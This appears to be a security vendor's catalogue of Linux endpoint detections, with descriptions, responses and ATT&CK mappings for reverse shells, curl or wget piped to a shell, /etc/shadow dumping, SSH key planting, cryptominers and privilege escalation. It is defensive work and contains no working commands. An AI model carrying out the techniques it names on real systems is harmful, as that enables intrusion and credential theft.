Linux Suspicious Process
These detections identify suspicious activity from process start records collected by the Insight Agent from Linux endpoints.
Attacker - Sudo Privilege Escalation Attempt
Description
Looks for the attempted exploitation of a vulnerability in sudo that allows for standard users to become root by specifying a user id of -1 or 4294967295
Recommendation
Review the command in question passed to sudo to see if it was executed successfully under the context of the root user.
MITRE ATT&CK Techniques
- Exploitation for Privilege Escalation - T1068
Attacker Technique - Apache Struts/Tomcat Spawns Uname
Description
This detection identifies ‘uname’ being spawned by ‘java’ running an Apache Tomcat web service. This technique is used by malicious actors to validate that an Apache Struts Tomcat server was successfully exploited.
Recommendation
Determine if the process being launched is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Exploit Public-Facing Application - T1190
Attacker Technique - Cat /etc/shadow
Description
This detection identifies the /etc/password file appearing in a command line. A malicious actor may try to dump the contents of this file for offline password cracking.
Recommendation
Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- /etc/passwd and /etc/shadow - T1003.008
Attacker Technique - Curl Or WGet To External IP Reporting Server IP In URL
Description
This detection identifies the 'curl' or 'wget' utility being used to access a remote IP address web server and report in the IP address of the vulnerable system in the URL. Malicious actors use utilities, such as these to call back to systems they have access to in order to validate which systems the attack was successful against.
Recommendation
Examine the IP address that is being contacted. Determine if the activity is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Attacker Technique - Curl or Wget To Public IP Address With Non Standard Port
Description
This detection identifies the 'curl' or 'wget' utility being used to access a remote IP address web server on a non standard port. Malicious actors often use utilities, such as these to download additional payloads after gaining access to a target resource.
Recommendation
Examine the IP address that is being contacted. Determine if the activity is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Attacker Technique - Linux Reverse Shell
Description
This detection identifies simple techniques to create a reverse shell in Linux using built-in utilities. Malicious actors use this technique to deliver a shell from the compromised host back to their system so that additional system commands can be executed, post compromise
Recommendation
Determine if the process being launched is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Command and Scripting Interpreter - T1059
Attacker Technique - Perl Use Socket Reverse Shell
Description
This detection identifies simple ‘perl’ based reverse shells using the ‘Socket’ module being passed to the command line. Malicious actors use this technique post compromise to deliver a shell from the compromised host back to their system so that additional system commands can be executed.
Recommendation
Determine if the process being launched is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Non-Application Layer Protocol - T1095
Attacker Technique - Shell Redirection To or From /dev/tcp
Description
This detection identifies redirection of a shell to a remote host through the device ‘/dev/tcp’. Malicious actors use this technique to deliver a shell from a compromised host back to their system so additional commands can be executed, post compromise.
Recommendation
Determine if the process being launched is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Non-Application Layer Protocol - T1095
Attacker Technique - Unshadow
Description
This detection identifies the use of the 'unshadow' utility being executed. This technique is used by malicious actors to retrieve the contents of the '/etc/shadow' and '/etc/password' files while preparing them for password cracking utilities.
Recommendation
Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- OS Credential Dumping - T1003
- /etc/passwd and /etc/shadow - T1003.008
Attacker Tools - Cobalt Strike Client Application - Linux
Description
This indicator is designed to detect the usage of the penetration testing/post-exploitation framework Cobalt Strike. This indicator is specific to Linux operating systems.
Recommendation
Investigate the process events to identify if this activity is authorized and expected within the client network.
MITRE ATT&CK Techniques
- Obtain Capabilities - T1588
Attacker Tool - Unknown Webshell Style Command
Description
This detection identifies commands being executed with the prefix of 'cd "/";' and a suffix of '2>&1' in the command line. This style of command execution has been used by malicious actors post compromise with webshell(s) of an unknown type.
Recommendation
Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Command and Scripting Interpreter - T1059
- Server Software Component - T1505
- Web Shell - T1505.003
Cryptocurrency Miner - Identify Writable Directories
Description
This detection identifies the 'touch' command being used to attempt to write a file, called 'writable', to various directories. This has been observed in cryptocurrency mining malware that is attempting to find writable directories.
Recommendation
Determine if the activity is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Resource Hijacking - T1496
Cryptocurrency Miner - Kworker
Description
This detection identifies Kworker being used, which is a customized version of the Linux bitcoin mining software, Minerd. Malicious actors drop KWorker on systems via other malware, such as Mirai, post compromise
Recommendation
Determine if the process being launched is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Resource Hijacking - T1496
Cryptocurrency Miner - MinerGate
Description
This detection identifies the command line including the string ‘Minergate’. ‘Minergate’ is a command line BitCoin miner often deployed by malicious actors.
Recommendation
Determine if the process being launched is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Resource Hijacking - T1496
Cryptocurrency Miner - Mining Pool URL in Command Line
Description
Mining pools are a way for multiple systems running cryptomining software to pool their resources over the network. Cryptocurrency mining malware will often use mining pools to increase efficiency, as it allows all of the attacker's compromised systems to work together.
Recommendation
Identify the miner process on the system. This can often be done easily by doing a process listing and identifying the process using the most CPU resources.
MITRE ATT&CK Techniques
- Resource Hijacking - T1496
Cryptocurrency Miner - Process Kills Other Mining Processes
Description
This detection identifies the ‘kill’ command being used in an attempt to stop the processes of cryptocurrency miners. Cryptocurrency miners will attempt to identify any other miners running on a system to ensure that it will not be competing for resources.
Recommendation
Determine if the activity is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Resource Hijacking - T1496
Cryptocurrency Miner - Watchbog
Description
Watchbog is a cryptocurrency mining trojan for Linux. It downloads payloads from Pastebin, and spreads laterally by exploiting Jenkins and Redis server vulnerabilities.
Recommendation
Determine whether this is part of authorized administrator activity. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Resource Hijacking - T1496
Cryptocurrency Miner - XMRig
Description
This detection identifies command line arguments consistent with XMRig. XMRig is a command line Monero miner often deployed by malicious actors.
Recommendation
Determine if the process being launched is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Resource Hijacking - T1496
Defense Evasion - HISTCONTROL=ignorespace
Description
This detection identifies the environment variable HISTCONTROL=ignorespace being added on Linux systems. This will cause any commands starting with a space to not be logged in the history file.
Recommendation
Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Clear Command History - T1070.003
Reconnaissance - Multiple SSH Discovery Commands
Description
This detection identifies multiple commands being run that attempt to discover information about SSH activity on the system. These commands include searching for id_rsa and known_hosts files, searching the contents of the bash_history file, searching the contents of the .ssh/config file, and searching for .pem certificates.
Recommendation
Determine whether this is part of authorized administrator activity. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- SSH - T1021.004
- SSH Authorized Keys - T1098.004
Suspicious Command - Remove and Recreate SSH Config Folder
Description
This detection identifies the ~/.ssh directory being removed and recreated. Malware has been observed doing this in order to overwrite any existing SSH configurations with its own.
Recommendation
Investigate the new files in the ~/.ssh directory. Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- SSH - T1021.004
- SSH Authorized Keys - T1098.004
Suspicious Command - SSH Key Echoed to Authorized Keys File
Description
This detection ientifies SSH keys being echoed via the command line into the ~/.ssh/authorized_keys file. Malware has been observed doing this in order to allow SSH access to the operator.
Recommendation
Investigate the key that was added. Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- SSH - T1021.004
- SSH Authorized Keys - T1098.004
Suspicious File - File Copied to Web Directory
Description
This detection identifies the mv command being used to move a file to a www directory. This may indicate a malicious actor is placing a web shell.
Recommendation
Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Web Shell - T1505.003
Suspicious Process - Apache Launches Wget or Curl
Description
This detection identifies an Apache process launching Curl or Wget. This may be done by a malicious actor who has compromised a web server in order to download additional malware.
Recommendation
Investigate the URL that is being contacted and whether or not it has a legitimate business use. If this activity is not benign or expected, consider rebuilding the host from a known, good source.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
- Web Shell - T1505.003
Suspicious Process - base64 Output Piped to Shell
Description
This detection identifies the base64 utility being used to decode base64-encoded command line arguments before passing them on to a shell process such as bash for execution. Malicious actors may use base64 encoded payloads to avoid detection.
Recommendation
Investigate the contents of the base64 encoded string. Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Deobfuscate/Decode Files or Information - T1140
Suspicious Process - cat Used to View Bash History File
Description
This detection identifies the cat command being used to show the contents of a .bash_history file. This file contains a history of shell commands that a user has run, and a malicious actor may inspect these commands to identify passwords or other sensitive information.
Recommendation
Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password and the passwords of any account that may have appeared in the history file.
MITRE ATT&CK Techniques
- Bash History - T1552.003
Suspicious Process - ColdFusion Webserver Spawns Shell Process
Description
This detection identifies shell processes such as 'cmd.exe' or bash being spawned by a ColdFusion process. Suspicious processes launched by ColdFusion may indicate a compromise of the web server.
Recommendation
Investigate the command being run and attempt to determine their purpose. Look for signs of further activity from a potential malicious actor, such as host or network discovery commands being executed, as these often precede attempts at lateral movement.
MITRE ATT&CK Techniques
- Web Shell - T1505.003
Suspicious Process - Common Compromised Linux Webserver Commands
Description
This detection identifies commands that Rapid7 has observed being run on compromised Linux webservers, especially those that have been compromised via Oracle Weblogic vulnerabilities CVE-2020-14882 and CVE-2020-14883, as well as Atlassian Confluence vulnerability CVE-2021-26084.
Recommendation
Investigate the processes spawned. Some commands may be encoded in hexadecimal or base64 - these should be decoded so that the intent can be determined. If this activity is not benign or expected, consider rebuilding the host from a known, good source and updating to the latest version of the server software.
MITRE ATT&CK Techniques
- Exploit Public-Facing Application - T1190
Suspicious Process - Confluence Java App Launching Processes
Description
This detection identifies processes being launched by the Atlassian Confluence server app. Malicious actors have been observed exploiting CVE-2021-26084 or CVE-2022-26134, vulnerabilties for Confluence which can allow execution of arbitrary processes. Confluence does sometimes spawn processes legitimately, but special attention should be paid to common reconnaissance commands like whoami or ifconfig, as well as any commands that indicate additional files being downloaded, such as curl or wget.
Recommendation
Investigate the processes spawned by Confluence. Some commands may be encoded in hexadecimal or base64 - these should be decoded so that the intent can be determined. If this activity is not benign or expected, consider rebuilding the host from a known, good source and updating to the latest version of Confluence.
Additional information can be found on Rapid7's blog. CVE-2021-26084: https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/ CVE-2022-26134: https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
MITRE ATT&CK Techniques
- Exploit Public-Facing Application - T1190
Suspicious Process - Curl Downloading From Cloudfront URL
Description
This detection identifies the 'curl' command being used to download data from a CloudFront URL. Malicious actors have been observed using 'curl' to download second stage payloads from CloudFront.
Recommendation
Investigate the contents of the CloudFront URL. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Web Service - T1102
- Ingress Tool Transfer - T1105
Suspicious Process - Curl Downloading Shell Script
Description
This detection identifies Curl being used to download a shell script. The Curl utility is often used by malicious actors to download additional payloads on compromised Linux systems.
Recommendation
Investigate the URL and the file that was pulled from it. Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Suspicious Process - Curl or WGet Pipes Output to Shell
Description
This detection identifies output from the Curl or WGet utility being piped to bash or another shell process. Malicious actors may use Curl or WGet to download additional malware, and pipe that malware to a shell for execution.
Recommendation
Investigate the URL that was downloaded from. Examine any additional processes spawned by the shell process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Unix Shell - T1059.004
- Ingress Tool Transfer - T1105
Suspicious Process - Curl Output Piped to Perl
Description
This detection identifies output from the Curl utility being piped to Perl. Malicious actors may use Curl to download additional malware, and pipe that malware to Perl for execution.
Recommendation
Investigate the URL that was downloaded from. Examine any additional processes spawned by the Perl process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Suspicious Process - Curl Output Piped to Python
Description
This detection identifies output from the Curl utility being piped to Python. Malicious actors may use Curl to download additional malware, and pipe that malware to Python for execution.
Recommendation
Investigate the URL that was downloaded from. Examine any additional processes spawned by the Python process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Python - T1059.006
- Ingress Tool Transfer - T1105
Suspicious Process - Deleting ld.so.preload
Description
This detection identifies the file ld.so.preload being deleted. This file contains a list of libraries that will be loaded by any user-mode process, and a malicious actor may replace it with one that points to their own malicious code.
Recommendation
Investigate the contents of the ld.so.preload file. Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Shared Modules - T1129
Suspicious Process - Fetch Command to External IP Address
Description
This detection identifies the fetch command being used to communicate with an external IP address. Malicious actors use the fetch command to download second stage payloads during Linux compromises.
Recommendation
Investigate the IP address that is being contacted and the contents of any files named ‘fetch.txt’, as this is the default file that the fetch command will write to. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Suspicious Process - Grepping Shell History
Description
This detection identifies the Grep command being used to search the contents of the shell history file. A malicious actor may do this in order to identify sensitive information such as passwords, or targets for lateral movement.
Recommendation
Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Bash History - T1552.003
Suspicious Process - Linux Adding User using dbus-send CreateUser
Description
This detection identifies user creation attempt using linux dbus-send command. This Linux vulnerability can be exploited to gain root access via privilege escalation with polkit. This can be used by malicious actors to add root user, thus gaining root access level to the system.
Recommendation
Examine that this activity is benign or expected. If this is not expected, consider rebuilding the host from a known, good source and having the user change their password. Also check for any new root user that may have been added with successful exploitation of this vulnerability.
Suspicious Process - Linux Setting User Password using dbus-send SetPassword
Description
This detection identifies SetPassword attempt using linux dbus-send command. This Linux vulnerability can be exploited to gain root access via privilege escalation with polkit. This can be used by malicious actors to add root user and set password, thus gaining root access level to the system.
Recommendation
Examine that this activity is benign or expected. If this is not expected, consider rebuilding the host from a known, good source and having the user change their password. Also check for any new root user that may have been added with successful exploitation of this vulnerability.
MITRE ATT&CK Techniques
- Exploitation for Privilege Escalation - T1068
Suspicious Process - Linux System OS Discovery Command
Description
This detection identifies an attempt to use cat to output the contents of files in the /etc directory that may contain OS information. Malicious actors may do this to know what OS version to target. This command has been observed in use by the RotaJakiro malware.
Recommendation
Determine whether this is part of authorized administrator activity. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Software Discovery - T1518
Suspicious Process - Linux Webserver Executing Commands
Description
Identifies suspicious commands executed by processes belonging to commonly used webserver software, such as Apache or Nginx. Commands executed by a webserver process can be indicative of a web shell or otherwise compromised webserver.
Recommendation
Determine whether the commands being executed are part of the expected operation of the server. If not, investigate any files, domains, or IP addresses that the executed commands may have interacted with.
MITRE ATT&CK Techniques
- Web Shell - T1505.003
Suspicious Process - lwp-download to External IP Address
Description
This detection identifies LWP-Download, which is a Linux utility for downloading files from the internet. Malicious actors can use LWP-download to download second stage payloads during Linux compromises.
Recommendation
Examine the command run and the URL it is contacting. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Suspicious Process - Possible Reverse Shell
Description
This detection identifies a number of reverse shells that can be created using mostly built-in Linux functions. Attackers may use these reverse shells for C2 purposes.
Recommendation
Examine the process that spawned the shell, and anything that the shell process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Unix Shell - T1059.004
Suspicious Process - ssh_authorized_keys in Command Line
Description
This detection identifies when the ssh_authorized_keys file appears in a command line. A malicious actor may modify this file so that they may access the host with their own SSH key.
Recommendation
Ensure that the key corresponds to a host from which authorization is expected.
MITRE ATT&CK Techniques
- SSH Authorized Keys - T1098.004
Suspicious Process - SysJoker Process Names
Description
This detection identifies process names identified as part of the SysJoker malware family. SysJoker is a multi-platform backdoor that masquerades as a system update.
Recommendation
Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Masquerading - T1036
Suspicious Process - VMware Workspace ONE Access Launches Process
Description
This detection identifies the Apache prunsrv component of VMware Workspace ONE Access launching suspicious processes. This may be indicative of remote code execution resulting from exploitation of CVE-2022-22954. See our blog post for more information: https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/
Recommendation
Ensure VMWare components are upgraded to the latest version. Review the process that was launched and any processes that it may have launched. If this activity is not benign or expected, consider rebuilding the host from a known, good source.
MITRE ATT&CK Techniques
- Exploitation of Remote Services - T1210
Suspicious Process - WGet Output Piped to Bash
Description
This detection identifies output from the WGet utility being piped to bash or another shell process. Malicious actors may use WGet to download additional malware, and pipe that malware to bash for execution.
Recommendation
Investigate the URL that was downloaded from.Examine any additional processes spawned by the bash process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Suspicious Process - Wget Output Piped to Perl
Description
This detection identifies output from the WGet utility being piped to Perl. Malicious actors may use WGet to download additional malware, and pipe that malware to Perl for execution.
Recommendation
Investigate the URL that was downloaded from. Examine any additional processes spawned by the Perl process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Suspicious Process - WGet Output Piped to Python
Description
This detection identifies output from the WGet utility being piped to Python. Malicious actors may use WGet to download additional malware, and pipe that malware to Python for execution.
Recommendation
Investigate the URL that was downloaded from. Examine any additional processes spawned by the Python process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Suspicious Process - Wget to External IP Address
Description
Identifies the wget utility being used to download files from an external IP address. Wget is often used by attackers on Linux-based systems to deploy additional tools after establishing a foothold on a system.
Recommendation
Determine the nature of the IP address by checking whois and dns records. If no obvious reason for downloading from that IP address exists, attempt to acquire and analyze the file that was downloaded from it.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Suspicious Process - WSO2 Product Launches Suspicious Process
Description
This detection identifies suspicious processes launched by a WSO2 product process, which may be indicative of exploitation of CVE-2022-29464. CVE-2022-29464 is an unrestricted arbitrary file upload vulnerability which can lead to remote code execution. Rapid7 has observed this CVE being actively exploited in the wild.
Additional information can be found on our blog: https://www.rapid7.com/blog/post/2022/04/22/opportunistic-exploitation-of-wso2-cve-2022-29464/
Recommendation
Investigate any .jsp or .war files created around the time of this activity, they may be web shells.
Additional information and remediation steps can be found in WSO2's advisory, https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738
MITRE ATT&CK Techniques
- Exploit Public-Facing Application - T1190
- Exploitation for Client Execution - T1203